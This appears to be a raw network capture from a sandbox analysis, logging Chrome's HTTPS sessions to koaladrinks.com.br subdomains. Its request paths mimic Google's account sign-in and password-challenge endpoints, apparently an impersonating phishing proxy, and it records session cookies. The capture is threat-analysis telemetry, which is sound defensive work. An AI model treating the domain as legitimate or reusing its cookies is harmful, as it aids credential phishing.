                                                      65192.168.2.949794139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:56 UTC1050OUTGET /favicon.ico HTTP/1.1
                                                      Host: ijgbload.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      sec-ch-ua-full-version: "117.0.5938.134"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-wow64: ?0
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://ijgbload.koaladrinks.com.br/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; __Host-GAPS=1:3-UTC4SFRFjKOB1Be52QGuvKCrHSyw:Y_T9kLgzI5emAt_J
                                                      2025-01-10 08:27:57 UTC32INHTTP/1.1 302 Moved Temporarily
                                                      2025-01-10 08:27:57 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:27:57 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                      Data Ascii: Cache-Control: no-cache, no-store
                                                      2025-01-10 08:27:57 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:27:57 UTC40INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a
                                                      Data Ascii: Content-Type: text/html; charset=UTF-8
                                                      2025-01-10 08:27:57 UTC82INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 4f 70 65 6e 65 72 2d 50 6f 6c 69 63 79 2d 52 65 70 6f 72 74 2d 4f 6e 6c 79 3a 20 73 61 6d 65 2d 6f 72 69 67 69 6e 3b 20 72 65 70 6f 72 74 2d 74 6f 3d 22 63 6f 6f 70 5f 67 73 65 5f 71 65 62 68 6c 6b 22 0d 0a
                                                      Data Ascii: Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"
                                                      2025-01-10 08:27:57 UTC37INData Raw: 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 38 3a 32 37 3a 35 36 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Fri, 10 Jan 2025 08:27:56 GMT
                                                      2025-01-10 08:27:57 UTC40INData Raw: 45 78 70 69 72 65 73 3a 20 4d 6f 6e 2c 20 30 31 20 4a 61 6e 20 31 39 39 30 20 30 30 3a 30 30 3a 30 30 20 47 4d 54 0d 0a
                                                      Data Ascii: Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      2025-01-10 08:27:57 UTC55INData Raw: 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 73 2e 6b 6f 61 6c 61 64 72 69 6e 6b 73 2e 63 6f 6d 2e 62 72 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 0d 0a
                                                      Data Ascii: Location: https://wwws.koaladrinks.com.br/favicon.ico
                                                      2025-01-10 08:27:57 UTC18INData Raw: 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a
                                                      Data Ascii: Pragma: no-cache
                                                      2025-01-10 08:27:57 UTC134INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 67 72 6f 75 70 22 3a 22 63 6f 6f 70 5f 67 73 65 5f 71 65 62 68 6c 6b 22 2c 22 6d 61 78 5f 61 67 65 22 3a 32 35 39 32 30 30 30 2c 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 63 73 70 2e 77 69 74 68 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 63 73 70 2f 72 65 70 6f 72 74 2d 74 6f 2f 67 73 65 5f 71 65 62 68 6c 6b 22 7d 5d 7d 0d 0a
                                                      Data Ascii: Report-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      66192.168.2.949795139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:56 UTC1095OUTPOST /log?format=json&hasfast=true&authuser=0 HTTP/1.1
                                                      Host: play.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      Content-Length: 676
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      Content-Type: application/x-www-form-urlencoded;charset=UTF-8
                                                      sec-ch-ua-full-version: "117.0.5938.134"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      X-Goog-AuthUser: 0
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-wow64: ?0
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Origin: https://ijgbload.koaladrinks.com.br
                                                      Sec-Fetch-Site: same-site
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Referer: https://ijgbload.koaladrinks.com.br/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202
                                                      2025-01-10 08:27:56 UTC676OUTData Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 22 65 6e 22 2c 6e 75 6c 6c 2c 22 34 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 22 31 31 37 22 5d 2c 5b 22 4e 6f 74 3b 41 3d 42 72 61 6e 64 22 2c 22 38 22 5d 2c 5b 22 43 68 72 6f 6d 69 75 6d 22 2c 22 31 31 37 22 5d 5d 2c 30 2c 22 57 69 6e 64 6f 77 73 22 2c 22 31 30 2e 30 2e 30 22 2c 22 78 38 36 22 2c 22 22 2c 22 31 31 37 2e 30 2e 35 39 33 38 2e 31 33 34 22 5d 2c 5b 31 2c 30 2c 30 2c 30 2c 30 5d 5d 5d 2c 31 38 32 38 2c 5b 5b 22 31 37 33 36 34 39 37 36 37 31 30 39 35 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c
                                                      Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,"en",null,"41",null,[[["Google Chrome","117"],["Not;A=Brand","8"],["Chromium","117"]],0,"Windows","10.0.0","x86","","117.0.5938.134"],[1,0,0,0,0]]],1828,[["1736497671095",null,null,null
                                                      2025-01-10 08:27:57 UTC17INHTTP/1.1 200 OK
                                                      2025-01-10 08:27:57 UTC40INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 43 72 65 64 65 6e 74 69 61 6c 73 3a 20 74 72 75 65 0d 0a
                                                      Data Ascii: Access-Control-Allow-Credentials: true
                                                      2025-01-10 08:27:57 UTC45INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 48 65 61 64 65 72 73 3a 20 58 2d 50 6c 61 79 6c 6f 67 2d 57 65 62 0d 0a
                                                      Data Ascii: Access-Control-Allow-Headers: X-Playlog-Web
                                                      2025-01-10 08:27:57 UTC66INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 69 6a 67 62 6c 6f 61 64 2e 6b 6f 61 6c 61 64 72 69 6e 6b 73 2e 63 6f 6d 2e 62 72 0d 0a
                                                      Data Ascii: Access-Control-Allow-Origin: https://ijgbload.koaladrinks.com.br
                                                      2025-01-10 08:27:57 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:27:57 UTC24INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 0d 0a
                                                      Data Ascii: Cache-Control: private
                                                      2025-01-10 08:27:57 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:27:57 UTC41INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a
                                                      Data Ascii: Content-Type: text/plain; charset=UTF-8
                                                      2025-01-10 08:27:57 UTC44INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 52 65 73 6f 75 72 63 65 2d 50 6f 6c 69 63 79 3a 20 63 72 6f 73 73 2d 6f 72 69 67 69 6e 0d 0a
                                                      Data Ascii: Cross-Origin-Resource-Policy: cross-origin
                                                      2025-01-10 08:27:57 UTC37INData Raw: 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 38 3a 32 37 3a 35 37 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Fri, 10 Jan 2025 08:27:57 GMT


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      67192.168.2.949796139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:56 UTC981OUTGET /favicon.ico HTTP/1.1
                                                      Host: wwws.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      sec-ch-ua-full-version: "117.0.5938.134"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-wow64: ?0
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: same-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://ijgbload.koaladrinks.com.br/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202
                                                      2025-01-10 08:27:57 UTC17INHTTP/1.1 200 OK
                                                      2025-01-10 08:27:57 UTC22INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a
                                                      Data Ascii: Accept-Ranges: bytes
                                                      2025-01-10 08:27:57 UTC10INData Raw: 41 67 65 3a 20 35 32 33 0d 0a
                                                      Data Ascii: Age: 523
                                                      2025-01-10 08:27:57 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:27:57 UTC39INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 20 6d 61 78 2d 61 67 65 3d 36 39 31 32 30 30 0d 0a
                                                      Data Ascii: Cache-Control: public, max-age=691200
                                                      2025-01-10 08:27:57 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:27:57 UTC28INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 0d 0a
                                                      Data Ascii: Content-Type: image/x-icon
                                                      2025-01-10 08:27:57 UTC85INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 4f 70 65 6e 65 72 2d 50 6f 6c 69 63 79 2d 52 65 70 6f 72 74 2d 4f 6e 6c 79 3a 20 73 61 6d 65 2d 6f 72 69 67 69 6e 3b 20 72 65 70 6f 72 74 2d 74 6f 3d 22 73 74 61 74 69 63 2d 6f 6e 2d 62 69 67 74 61 62 6c 65 22 0d 0a
                                                      Data Ascii: Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="static-on-bigtable"
                                                      2025-01-10 08:27:57 UTC44INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 52 65 73 6f 75 72 63 65 2d 50 6f 6c 69 63 79 3a 20 63 72 6f 73 73 2d 6f 72 69 67 69 6e 0d 0a
                                                      Data Ascii: Cross-Origin-Resource-Policy: cross-origin
                                                      2025-01-10 08:27:57 UTC37INData Raw: 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 38 3a 31 39 3a 31 33 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Fri, 10 Jan 2025 08:19:13 GMT
                                                      2025-01-10 08:27:57 UTC40INData Raw: 45 78 70 69 72 65 73 3a 20 53 61 74 2c 20 31 38 20 4a 61 6e 20 32 30 32 35 20 30 38 3a 31 39 3a 31 33 20 47 4d 54 0d 0a
                                                      Data Ascii: Expires: Sat, 18 Jan 2025 08:19:13 GMT


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      68192.168.2.949797139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:56 UTC1095OUTPOST /log?format=json&hasfast=true&authuser=0 HTTP/1.1
                                                      Host: play.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      Content-Length: 544
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      Content-Type: application/x-www-form-urlencoded;charset=UTF-8
                                                      sec-ch-ua-full-version: "117.0.5938.134"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      X-Goog-AuthUser: 0
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-wow64: ?0
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Origin: https://ijgbload.koaladrinks.com.br
                                                      Sec-Fetch-Site: same-site
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Referer: https://ijgbload.koaladrinks.com.br/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202
                                                      2025-01-10 08:27:56 UTC544OUTData Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 22 65 6e 22 2c 6e 75 6c 6c 2c 22 34 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 22 31 31 37 22 5d 2c 5b 22 4e 6f 74 3b 41 3d 42 72 61 6e 64 22 2c 22 38 22 5d 2c 5b 22 43 68 72 6f 6d 69 75 6d 22 2c 22 31 31 37 22 5d 5d 2c 30 2c 22 57 69 6e 64 6f 77 73 22 2c 22 31 30 2e 30 2e 30 22 2c 22 78 38 36 22 2c 22 22 2c 22 31 31 37 2e 30 2e 35 39 33 38 2e 31 33 34 22 5d 2c 5b 31 2c 30 2c 30 2c 30 2c 30 5d 5d 5d 2c 31 38 32 38 2c 5b 5b 22 31 37 33 36 34 39 37 36 37 31 30 39 38 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c
                                                      Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,"en",null,"41",null,[[["Google Chrome","117"],["Not;A=Brand","8"],["Chromium","117"]],0,"Windows","10.0.0","x86","","117.0.5938.134"],[1,0,0,0,0]]],1828,[["1736497671098",null,null,null
                                                      2025-01-10 08:28:02 UTC17INHTTP/1.1 200 OK
                                                      2025-01-10 08:28:02 UTC40INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 43 72 65 64 65 6e 74 69 61 6c 73 3a 20 74 72 75 65 0d 0a
                                                      Data Ascii: Access-Control-Allow-Credentials: true
                                                      2025-01-10 08:28:02 UTC45INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 48 65 61 64 65 72 73 3a 20 58 2d 50 6c 61 79 6c 6f 67 2d 57 65 62 0d 0a
                                                      Data Ascii: Access-Control-Allow-Headers: X-Playlog-Web
                                                      2025-01-10 08:28:02 UTC66INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 69 6a 67 62 6c 6f 61 64 2e 6b 6f 61 6c 61 64 72 69 6e 6b 73 2e 63 6f 6d 2e 62 72 0d 0a
                                                      Data Ascii: Access-Control-Allow-Origin: https://ijgbload.koaladrinks.com.br
                                                      2025-01-10 08:28:02 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:28:02 UTC24INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 0d 0a
                                                      Data Ascii: Cache-Control: private
                                                      2025-01-10 08:28:02 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:28:02 UTC41INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a
                                                      Data Ascii: Content-Type: text/plain; charset=UTF-8
                                                      2025-01-10 08:28:02 UTC44INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 52 65 73 6f 75 72 63 65 2d 50 6f 6c 69 63 79 3a 20 63 72 6f 73 73 2d 6f 72 69 67 69 6e 0d 0a
                                                      Data Ascii: Cross-Origin-Resource-Policy: cross-origin
                                                      2025-01-10 08:28:02 UTC37INData Raw: 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 38 3a 32 38 3a 30 31 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Fri, 10 Jan 2025 08:28:01 GMT


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      69192.168.2.949798139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:57 UTC603OUTOPTIONS /log?format=json&hasfast=true&authuser=0 HTTP/1.1
                                                      Host: play.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      Accept: */*
                                                      Access-Control-Request-Method: POST
                                                      Access-Control-Request-Headers: content-encoding,content-type,x-goog-authuser
                                                      Origin: https://ijgbload.koaladrinks.com.br
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Site: same-site
                                                      Sec-Fetch-Dest: empty
                                                      Referer: https://ijgbload.koaladrinks.com.br/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-10 08:27:58 UTC17INHTTP/1.1 200 OK
                                                      2025-01-10 08:27:58 UTC40INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 43 72 65 64 65 6e 74 69 61 6c 73 3a 20 74 72 75 65 0d 0a
                                                      Data Ascii: Access-Control-Allow-Credentials: true
                                                      2025-01-10 08:27:58 UTC112INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 48 65 61 64 65 72 73 3a 20 58 2d 50 6c 61 79 6c 6f 67 2d 57 65 62 2c 61 75 74 68 6f 72 69 7a 61 74 69 6f 6e 2c 63 6f 6e 74 65 6e 74 2d 65 6e 63 6f 64 69 6e 67 2c 63 6f 6e 74 65 6e 74 2d 74 79 70 65 2c 78 2d 67 6f 6f 67 2d 61 75 74 68 75 73 65 72 2c 6f 72 69 67 69 6e 0d 0a
                                                      Data Ascii: Access-Control-Allow-Headers: X-Playlog-Web,authorization,content-encoding,content-type,x-goog-authuser,origin
                                                      2025-01-10 08:27:58 UTC50INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4d 65 74 68 6f 64 73 3a 20 47 45 54 2c 20 50 4f 53 54 2c 20 4f 50 54 49 4f 4e 53 0d 0a
                                                      Data Ascii: Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                      2025-01-10 08:27:58 UTC66INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 69 6a 67 62 6c 6f 61 64 2e 6b 6f 61 6c 61 64 72 69 6e 6b 73 2e 63 6f 6d 2e 62 72 0d 0a
                                                      Data Ascii: Access-Control-Allow-Origin: https://ijgbload.koaladrinks.com.br
                                                      2025-01-10 08:27:58 UTC31INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 4d 61 78 2d 41 67 65 3a 20 38 36 34 30 30 0d 0a
                                                      Data Ascii: Access-Control-Max-Age: 86400
                                                      2025-01-10 08:27:58 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:27:58 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:27:58 UTC41INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a
                                                      Data Ascii: Content-Type: text/plain; charset=UTF-8
                                                      2025-01-10 08:27:58 UTC37INData Raw: 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 38 3a 32 37 3a 35 38 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Fri, 10 Jan 2025 08:27:58 GMT
                                                      2025-01-10 08:27:58 UTC17INData Raw: 53 65 72 76 65 72 3a 20 50 6c 61 79 6c 6f 67 0d 0a
                                                      Data Ascii: Server: Playlog


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      70192.168.2.949799139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:58 UTC810OUTGET /v3/signin/_/AccountsSignInUi/data/batchexecute?rpcids=WZfWSd%2CAho3hb%2Ci3kFoc%2CzKAP2e%2CRzSO2e&source-path=%2Fv3%2Fsignin%2Fchallenge%2Fpwd&f.sid=-3172993228359564282&bl=boq_identityfrontendauthuiserver_20250105.08_p0&hl=en&TL=AO-GBTeOPSBKWx6KOWwqKt4fYNm6VaeGpN7ldDzfG2E16DR1jOu6Lh9CEdomjH5B&_reqid=312469&rt=c HTTP/1.1
                                                      Host: ijgbload.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; __Host-GAPS=1:3-UTC4SFRFjKOB1Be52QGuvKCrHSyw:Y_T9kLgzI5emAt_J
                                                      2025-01-10 08:27:59 UTC33INHTTP/1.1 405 Method Not Allowed
